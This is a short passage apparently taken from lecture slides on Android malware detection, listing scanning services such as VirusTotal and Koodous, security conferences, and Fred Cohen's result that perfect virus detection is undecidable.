https://android-developers.googleblog.com/2017/01/findingmalware.html
40. Malware detection tools
URLVoid : check if a URL is blacklisted.
VirusTotal (owned by Alphabet) : collaborative platform. Your submitted APK is checked against a large number of malware engines (McAfee, AVG, TrendMicro, ...).
Koodous : another collaborative platform, specific to Android APKs.
41. Resources
1. Conferences : Blackhat, DefCon, RSA, IEEE Security & Privacy, USENIX Security, ACM. Also see uploaded videos of past conferences.
2. https://github.com/ashishb/android-security-awesome
42. Malware detection
Theoretical result by Fred Cohen
Deciding whether an arbitrary program is a virus is undecidable: a perfect detector would let you solve the halting problem.
Therefore, anti-virus algorithms are necessarily approximate: heuristic or probabilistic, with false positives and false negatives.